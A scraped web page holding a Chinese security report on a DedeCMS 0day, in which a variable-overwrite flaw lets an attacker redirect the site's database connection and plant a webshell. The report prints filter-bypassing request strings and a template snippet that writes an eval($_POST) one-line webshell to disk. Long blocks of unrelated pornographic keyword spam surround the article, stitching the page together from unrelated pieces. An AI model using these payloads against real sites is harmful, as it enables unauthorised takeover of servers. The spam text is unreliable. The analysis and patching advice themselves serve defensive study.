精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Dede GetWebShell 0Day漏洞分析報告

安全
DedeCMS的漏洞成因主要是由于變量覆蓋導致而成,攻擊者通過通過提交變量,覆蓋數據庫連接配置的全局變量,從而可以使被攻擊的網站反向連接攻擊者指定的數據庫,讀取指定的內容,并在被攻擊的網站中直接寫入WebShell。

51CTO.com綜合報道】

事件背景:

近日很多網站被爆遭到入侵,經過安全寶安全實驗室研究分析,這些網站使用的都是DedeCMS內容管理系統,DedeCMS爆出一個很嚴重的漏洞,攻擊者可以直接向服務器中寫入"一句話木馬"。

DedeCMS的漏洞成因主要是由于變量覆蓋導致而成,攻擊者通過通過提交變量,覆蓋數據庫連接配置的全局變量,從而可以使被攻擊的網站反向連接攻擊者指定的數據庫,讀取指定的內容,并在被攻擊的網站中直接寫入WebShell。從整個攻擊過程來看,這種攻擊利用方式也比較巧妙,避開了傳統的注入,破解,登錄后臺和上傳木馬的攻擊模式,攻擊者可以在未授權的前提下直接向網站目錄中寫入WebShell,從而控制網站,危害嚴重。

隨著網站管理員的安全意識的逐漸提高,網絡安全設備的引入,模塊和程序的過濾;傳統的入侵模式也越來越捉襟見肘,從這次攻擊中,我們發現傳統的Web攻擊思想也在發生變換,它們正慢慢由正向攻擊向反向攻擊過渡,其實在系統的攻擊中,反向攻擊早就存在,攻擊者為了繞過防火墻一些列的前端過濾設備,利用木馬使被攻擊機器自己發起連向攻擊者機器的請求,而防火墻通常是不會攔截機器主動發現的連接,從而攻擊者很容易繞過了前端一系列的過濾和障礙。

分析報告:

下面我們一起來看下Dede的漏洞原因,首先我們來看個變量覆蓋漏洞的原型基礎:

VulTest.php:

<?php

$anquanbao="imiyoo_first";

foreach($_GET  as $key=>$value)

$$key=$value;

echo "\$anquanbao=".$anquanbao;

?>

攻擊者顯然通過$_GET提交變量覆蓋已經定義的變量,效果如下圖:

攻擊前圖片

攻擊后圖片($anquanbao變量已經被覆蓋)

有了這個漏洞的基礎,現在我們來看看Dede的漏洞詳細信息,漏洞主要發生在文件/plus/mytag_js.php中:

我們首先讀下這段代碼的處理流程,程序在開始會獲取用戶提交的$aid變量,如果需要顯示不需要顯示緩存內容,則會從數據庫表'#@_mytag'中讀取記錄,并將讀取的$tagbody內容以Dede模版形式寫入緩存文件中。

在這里很顯然存在變量$aid的注入漏洞,但由于該表的內容一般都為空,而且Dede對提交的單引號都會有過濾,基本屬于雞肋漏洞;但是如果結合變量覆蓋漏洞,攻擊者就可以利用該漏洞覆蓋數據庫配置文件的連接信息,將數據庫的連接重定向到攻擊者可以控制的一個數據庫,那么這樣攻擊者就能完全控制$tagbody的內容,而且在DedeCMS文章管理系統中,模版中是可以嵌入PHP代碼,也就是說攻擊者可以執行自己的PHP代碼,從而可以輕易地向服務器中寫入一句話木馬,達到攻擊的效果。

在對漏洞進行測試的時候,我們發現Dede產生變量覆蓋漏洞的代碼在/include/common.inc.php中,如下:

通過這段代碼我們可以對程序中的任何變量進行覆蓋,為了覆蓋數據庫配置文件中的變量,其實我們覆蓋$cfg_dbhost或$GLOBALS[cfg_dbhost]都可以,因此我們可以提交形如下面的測試代碼:

   Ø mytag_js.php?_GET[cfg_dbhost]=www.anquanbao.com

   Ø mytag_js.php?_GET[GLOBALS][cfg_dbhost]= www.anquanbao.com

不過DedeCMS對這種形式的攻擊也是有防范,但只是對提交的變量中的鍵值進行了判斷,代碼如下:

但是這個變量$_k只是對一維數據的鍵值進行判斷,而Dede對變量的提取卻是支持多維的,如果攻擊者提交的是多維的變量就可以很容易繞過,為了繞過正則的檢測,同時達到覆蓋變量的效果;因此我們可以很容易想到$_COOKIE變量,更重要的是Dede也支持$_COOKIE提交變量,因此我們就可以得到如下的有效攻擊代碼: 

Ø mytag_js.php?_GET[_COOKIE][GLOBALS][cfg_dbhost]=www.anquanbao.com

利用上面的代碼就可以繞過DedeCMS的正則檢測,同時可以覆蓋$GLOBALS[cfg_dbhost]變量。

分析總結:

通過對上面的分析,那么現在我們就能很清楚整個攻擊流程:

1 攻擊者會預先準備一個MySQL數據庫,數據庫中包含有一個表明為'#@_mytag'的數據表,其中'#@'是待攻擊數據庫的表前綴,并在表中插入一條記錄來控制$tagbody的內容,使其能夠寫入一句話木馬,而且Dede利用模版寫入一句話木馬的代碼如下:

{dede:php}

$fp = @fopen("test.php", \'a\');

@fwrite($fp, \'<?php eval($_POST[test]) ?>\');

echo "OK";

@fclose($fp);

{/dede:php}

2 提交變量覆蓋語句讀取表中指定的內容,即可在當前路徑下寫入一句話木馬。

鑒于很多使用DedeCMS的網站還沒有修補該漏洞,因此在這里就不公布危害性攻擊代碼。

安全建議:

許多程序員在對$_GET,$_POST或$_COOKIE獲取的變量處理中,進行了對多維數組變量的遞歸解析,但是卻在過濾的時候并沒有對每一維的鍵值進行判斷和檢測;例如,在本次爆出的Dede的0day,程序員就只考慮到檢測二維數組的鍵值,但是攻擊者卻可以通過提交三維數組生成COOKIE變量輕易繞過。因此程序員如果在保證程序能夠對多維變量進行解析的時候,同時也是需要對每一維的鍵值進行有效檢測和判斷。

 

責任編輯:守望幸福 來源: 51CTO.com
相關推薦

2015-05-20 16:34:14

2009-07-06 13:15:07

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2021-10-06 13:48:50

0day漏洞攻擊

2022-03-25 13:41:55

漏洞網絡攻擊Quantum(量子

2013-05-24 14:02:42

2022-03-30 09:09:39

漏洞網絡安全網絡攻擊

2015-07-08 13:52:18

2020-12-17 10:28:27

漏洞網絡攻擊網絡安全

2010-01-20 16:13:15

2021-07-14 17:17:45

0day漏洞惡意代碼

2011-02-28 09:34:55

2011-03-15 15:14:22

2009-09-09 08:54:50

2015-08-31 10:09:34

2010-09-01 15:18:04

2014-10-15 17:29:33

2009-11-29 16:53:17

2021-04-13 16:40:18

0Day漏洞遠程代碼

2021-07-27 11:01:02

Windows
點贊
收藏

51CTO技術棧公眾號

国产精品观看在线亚洲人成网| 欧美色综合网站| 好吊色欧美一区二区三区| 日韩污视频在线观看| 亚洲人成网www| 欧美视频日韩视频在线观看| 中国一区二区三区| 亚洲大尺度视频| 国产精品久久久久久模特| 亚洲一级黄色av| 特黄特黄一级片| 末成年女av片一区二区下载| 国产精品天美传媒沈樵| 亚洲最大福利网站| 在线观看亚洲天堂| 国产高清一区| 亚洲国产精品va在看黑人| 欧美日韩一区二区在线免费观看| 大胆av不用播放器在线播放| 国产一区在线观看视频| 91av视频在线| 国产美女福利视频| 你微笑时很美电视剧整集高清不卡| 日本乱人伦一区| 日韩精品福利片午夜免费观看| www.av黄色| 全国精品久久少妇| 午夜精品久久久久久久久久久久| 好吊视频在线观看| 亚洲一区二区电影| 欧美性xxxxxx少妇| 无码播放一区二区三区| 99福利在线| 国产日韩影视精品| 精品国产乱码久久久久久蜜柚| 夜夜爽妓女8888视频免费观看| 欧美影院一区| 中文字幕欧美日韩在线| 国产精品嫩草av| 国产日韩在线观看视频| 在线免费观看视频一区| 欧美大片在线播放| 欧美色图天堂| 亚洲柠檬福利资源导航| 一区二区免费在线观看| 欧美男男同志| 99视频一区二区三区| 97久久夜色精品国产九色| 自拍偷拍第八页| 亚洲综合日本| 91国内在线视频| 欧美极品视频在线观看| 亚洲乱码精品| www.欧美免费| 国产精品18在线| 清纯唯美日韩| 一区二区福利视频| 偷拍夫妻性生活| 亚洲成人一品| 亚洲欧美激情一区| 魔女鞋交玉足榨精调教| 四虎影视精品| 日韩精品中文字幕在线观看| 黄色免费视频网站| 看全色黄大色大片免费久久久| 91麻豆精品国产91久久久使用方法 | 亚洲美女视频网| 日韩精品人妻中文字幕有码 | 国产九一精品| 精品无人区太爽高潮在线播放| 中文字幕永久免费| 黄色网一区二区| 精品国产一区二区精华| 国产情侣久久久久aⅴ免费| 一区二区三区亚洲变态调教大结局 | 日韩av123| 人妻 日韩精品 中文字幕| 免费一区视频| 国产成人精品日本亚洲专区61| 黄网在线观看视频| 久久久久国产精品午夜一区| 国产精品国产三级国产aⅴ9色| 久草视频一区二区| 奇米影视一区二区三区| 91精品久久久久久久久久久久久久 | 我想看黄色大片| 大片网站久久| 色婷婷**av毛片一区| 尤物在线免费视频| 激情久久中文字幕| 国产mv久久久| 97人妻精品一区二区三区动漫| 精品中文字幕一区二区小辣椒| 91视频免费在线| 二区三区在线视频| 久久久噜噜噜久久中文字幕色伊伊 | aa亚洲婷婷| 国产精品福利在线观看网址| 99精品视频在线播放免费| 成人免费看的视频| 青青草原亚洲| 在线观看三级视频| 色狠狠综合天天综合综合| www欧美激情| 91大神精品| 亚洲欧美综合图区| 欧产日产国产v| 亚洲一区二区网站| 成人午夜小视频| 同心难改在线观看| 亚洲三级小视频| 日本一区二区黄色| 经典三级久久| 精品性高朝久久久久久久| 一区二区三区影视| 久久www成人_看片免费不卡| 成人精品一区二区三区电影免费| 亚洲国产av一区二区| 国产日韩精品久久久| 国产精品第157页| julia一区二区三区中文字幕| 日韩一区二区三区在线视频| 亚洲成人网在线播放| 国产精品99免费看| 国产精品综合久久久| 亚洲欧美色视频| 夜夜精品浪潮av一区二区三区| 国产素人在线观看| 精品一区二区三区中文字幕视频| 亚洲激情第一页| 黄色录像二级片| 日韩精品亚洲专区| 精品亚洲第一| heyzo中文字幕在线| 欧美一级在线视频| 欧美日韩国产一二三区| 久久福利精品| 国产区一区二区| www久久日com| 88在线观看91蜜桃国自产| 级毛片内射视频| 国产精品久久久一区二区| 高清国语自产拍免费一区二区三区| av影片在线看| 欧美曰成人黄网| 国产123在线| 久久国产日韩| 久久视频在线观看中文字幕| gogo高清在线播放免费| 欧美成人精品3d动漫h| 婷婷激情四射网| 韩日av一区二区| 亚洲最新在线| 成人免费在线观看视频| 国产亚洲欧洲黄色| 亚洲欧美另类在线视频| 久久免费精品国产久精品久久久久| 欧美亚洲色图视频| av成人男女| 国精产品一区一区三区有限在线| 国产精品爽爽久久久久久| 国产精品国产自产拍高清av| 中文字幕精品一区二区三区在线| 国内亚洲精品| 国产精品人成电影在线观看| 亚洲精品传媒| 91.麻豆视频| 久草视频免费在线| 99综合电影在线视频| 国产二区视频在线播放| 亚洲大片精品免费| 国产精品久久久久不卡| 午夜免费福利在线观看| 欧美一区二区三区免费大片| 强行糟蹋人妻hd中文| 成人黄色在线视频| 国产精品少妇在线视频| 日韩在线视屏| 99re视频| av电影一区| 中文字幕日韩欧美精品在线观看| 天天天天天天天干| 国产精品久久久久久久午夜片| 成人综合久久网| 好看的av在线不卡观看| 久久综合久久综合这里只有精品| 欧美二三四区| 日韩亚洲精品电影| 亚洲精品一区二区三区新线路| 午夜精品福利在线| 成人在线观看免费高清| 国产精选一区二区三区| 国产成人无码a区在线观看视频| 日韩mv欧美mv国产网站| 国产精品视频内| 国产偷倩在线播放| 中文字幕不卡av| 亚洲精品一区二区口爆| 色88888久久久久久影院按摩 | 国产aaa免费视频| 岳的好大精品一区二区三区| 国产精品在线看| 98色花堂精品视频在线观看 | 九色在线免费| 91精品中文字幕一区二区三区| 久久免费视频精品| 国产精品久久久久久久久快鸭| 无套白嫩进入乌克兰美女| 国产九九精品| 色一情一乱一乱一区91| 国产乱码精品一区二区三区四区 | 日韩专区视频| 7777精品视频| 国产激情小视频在线| 亚洲欧美日韩中文在线制服| 国产极品久久久| 色94色欧美sute亚洲13| 久久久久99精品| 国产精品久久久久久久久果冻传媒| 原创真实夫妻啪啪av| 日本午夜一区二区| 国产美女主播在线播放| 欧美高清视频在线观看mv| 麻豆av一区二区三区| 欧洲精品99毛片免费高清观看 | 亚洲一区观看| 国产成人在线小视频| 婷婷色综合网| 午夜精品区一区二区三| 清纯唯美亚洲经典中文字幕| 91传媒视频免费| 四虎地址8848精品| 国产精品高清网站| 成人激情综合| 欧美有码在线视频| 看黄在线观看| 久久久久久成人| 91cn在线观看| 久久天堂电影网| 视频免费一区| 深夜福利91大全| www免费网站在线观看| 亚洲欧美日韩图片| 欧洲视频在线免费观看| 亚洲激情免费观看| 日韩中文字幕影院| 337p日本欧洲亚洲大胆精品| 超碰在线人人干| 日韩视频永久免费| 亚洲精品久久久久久动漫器材一区| 欧美手机在线视频| 中文字幕一区二区在线视频 | 精品无人区一区二区三区 | 国产高清在线| 伊人激情综合网| 一区二区高清不卡| 啊v视频在线一区二区三区| 嫩草香蕉在线91一二三区| 三级精品视频久久久久| 免费在线看a| 久久综合免费视频影院| 色女人在线视频| 欧美精品激情在线| 嗯~啊~轻一点视频日本在线观看| 欧美日韩第一视频| 国精产品一区一区三区mba下载| 久操成人在线视频| av剧情在线观看| 热99久久精品| julia一区二区三区中文字幕| 国产极品jizzhd欧美| 天然素人一区二区视频| 国产欧美久久久久久| 国产一精品一av一免费爽爽| 99re热精品| 先锋影音国产精品| 手机看片福利永久国产日韩| 国产精品久久占久久| 免费看欧美一级片| 亚洲综合日韩| 久久国产这里只有精品| 国产精品资源在线| 国产国语性生话播放| 欧美国产日韩精品免费观看| 日韩三级久久久| 亚洲电影中文字幕在线观看| 中文字幕第四页| 欧美日韩中文一区| 亚洲av无码乱码国产精品久久| 精品国产电影一区二区| 久色视频在线| 欧美不卡视频一区发布| 成人性生活av| 91综合免费在线| 欧美三级午夜理伦三级在线观看| 奇米影视首页 狠狠色丁香婷婷久久综合 | 国产精品免费精品自在线观看| 国产精品视频在线观看| 日韩中文字幕在线一区| 蜜桃999成人看片在线观看| 久久精品高清| 我的公把我弄高潮了视频| 日本亚洲最大的色成网站www| 91日韩精品视频| 99久久国产综合精品女不卡| 极品美妇后花庭翘臀娇吟小说| 亚洲一区国产视频| 中文字幕欧美色图| 亚洲国产精品嫩草影院久久| 亚洲天天影视| 2024亚洲男人天堂| 亚洲精品高潮| 伊甸园精品99久久久久久| 亚洲欧美日本日韩| 欧美体内she精高潮| 国产日韩欧美制服另类| 国产在线拍揄自揄拍无码视频| 色婷婷国产精品综合在线观看| 97人妻精品一区二区三区| 亚洲全黄一级网站| 77thz桃花论族在线观看| 91美女片黄在线观| 欧洲三级视频| 777久久久精品一区二区三区| 老司机午夜精品| 亚洲精品成人无码| 亚洲成av人在线观看| 国产sm主人调教女m视频| 日韩资源在线观看| 搜成人激情视频| 久久精品日产第一区二区三区乱码 | 国产一区二区在线观看免费| 国产真人做爰视频免费| 性欧美大战久久久久久久久| 国产成人三级一区二区在线观看一 | 欧美精品欧美精品系列| 欧美高清成人| 97色在线视频观看| 欧美午夜在线播放| 亚洲综合五月天| 欧美96一区二区免费视频| 国产艳俗歌舞表演hd| 黄色成人在线免费| 欧美一区二区三区激情| 欧美激情按摩在线| 日本亚州欧洲精品不卡| 久久天天东北熟女毛茸茸| 激情av综合网| 成人免费毛片xxx| 欧美久久一区二区| 欧洲不卡av| 国产视频观看一区| 久久精品国产大片免费观看| 久久久精品麻豆| 国产精品无人区| 亚洲视频一区二区三区四区| 一区二区三区美女xx视频| 欧美日韩精品免费观看视欧美高清免费大片| 精品国产乱码久久久久| 在线一区视频| 欧美色图亚洲激情| 91福利国产精品| 中文字幕在线播放| 成人黄色在线播放| 亚洲精品国产偷自在线观看| 中文字幕1区2区| 亚洲国产sm捆绑调教视频 | 91桃色在线| 久久久久九九九| 日欧美一区二区| 顶级黑人搡bbw搡bbbb搡| 日韩一级大片在线| 欧美13videosex性极品| 日本在线播放一区| 国产真实乱对白精彩久久| 久草视频在线免费看| 日韩精品在线影院| 欧洲成人一区| 8x8x华人在线| 91免费视频网址| 无码人妻丰满熟妇区五十路 | 国产大尺度视频| 日韩欧美有码在线| 九色porny丨首页在线| 成人影片在线播放| 欧美一级专区| 国产探花视频在线| 日韩欧美国产电影| 中文字幕在线看片| 一区二区三区视频| 成人美女视频在线看| 在线观看日本网站| 久久视频在线免费观看| 日本欧美高清| 天天综合网久久| 亚洲国产aⅴ天堂久久| jyzzz在线观看视频| 成人一区二区在线| 另类专区欧美蜜桃臀第一页| 福利一区二区三区四区|